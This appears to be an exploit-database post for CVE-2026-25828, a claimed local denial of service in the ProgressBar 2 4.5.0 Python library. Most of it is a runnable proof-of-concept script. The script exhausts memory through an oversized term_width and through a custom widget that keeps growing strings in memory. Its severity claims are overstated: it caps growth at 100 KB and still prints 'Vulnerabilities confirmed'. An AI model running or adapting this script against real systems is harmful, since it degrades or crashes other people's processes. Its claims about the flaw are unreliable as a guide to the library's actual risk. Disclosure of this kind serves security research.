ProgressBar 2 4.5.0 - Unbounded Resource Consumption DoS

2026.02.14
Credit: cardosource
Risk: Medium
Local: Yes
Remote: No
CVE: 2026-25828
CWE: N/A

#!/usr/bin/env python3
"""
Exploit Title: ProgressBar 2 4.5.0 - Unbounded Resource Consumption Denial of Service (DoS)

The ProgressBar library for Python (version 2 4.5.0) contains multiple unbounded
resource consumption vulnerabilities that allow a local attacker to cause a
Denial of Service (DoS). By providing overly large values for parameters such as
term_width or maxval, or by using a custom widget that returns an excessively
long string, an attacker can force the library to allocate massive amounts of
memory or perform CPU-intensive calculations, leading to a process crash or
system unresponsiveness.

Tested on: Linux, Windows (Python 3.x)
CVE: CVE-2026-25828
"""
import os
import sys
import time

# Add the script's directory to the path so a local copy of the library's
# progressbar.py / widgets.py can be imported.
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))

try:
    from progressbar import ProgressBar
    from widgets import Percentage, ETA, Bar  # noqa: F401 (local widgets.py)

    print("[*] ProgressBar 2 4.5.0 DoS Exploit")
    print("-" * 50)

    # Attack Vector 1: memory exhaustion via an oversized term_width.
    # Every update renders a line padded out to term_width characters.
    print("[1] Memory exhaustion via term_width=999999")
    pbar1 = ProgressBar(maxval=100, term_width=999999)
    pbar1.start()
    for i in range(5):
        pbar1.update((i + 1) * 20)
        print(f"Update {i + 1} - Allocating ~1MB string")
        time.sleep(0.5)
    pbar1.finish()
    print("[SUCCESS] Memory consumption forced")

    # Attack Vector 2: a custom widget whose rendered string keeps growing.
    print("\n[2] Malicious widget with exponential string growth")
    from progressbar import widgets

    class DoSWidget(widgets.Widget):
        def __init__(self):
            self.size = 1000
            self.stored_strings = []  # keep references so nothing is garbage collected

        def update(self, pbar):
            # Double the string size on each update (capped at 100 KB).
            self.size = min(self.size * 2, 100000)
            huge_string = "A" * self.size
            self.stored_strings.append(huge_string)  # keep a reference
            return f"[{len(huge_string)} bytes]"

    dos_widget = DoSWidget()
    pbar2 = ProgressBar(maxval=15, widgets=[dos_widget, " ", widgets.Bar()])
    pbar2.start()
    for i in range(15):
        pbar2.update(i + 1)
        print(f"Update {i + 1} - String size: {dos_widget.size} bytes")
        time.sleep(0.3)
    pbar2.finish()
    print("[SUCCESS] Progressive memory allocation demonstrated")

    print("\n[+] Exploit completed - Vulnerabilities confirmed")
    print("System may experience memory exhaustion or crash")

except MemoryError:
    print("\n[!] CRASH: System out of memory!")
    sys.exit(137)
except ImportError as e:
    print(f"\n[!] Error: {e}")
    print("Make sure progressbar files are in the current directory")
    sys.exit(1)
except Exception as e:
    print(f"\n[!] Unexpected error: {type(e).__name__}: {e}")
    sys.exit(1)

References:

https://pypi.org/project/progressbar/
https://files.pythonhosted.org/packages/19/24/3587e795fc590611434e4bcb9fbe0c3dddb5754ce1a20edfd86c587c0004/progressbar2-4.5.0.tar.gz

Copyright 2026, cxsecurity.com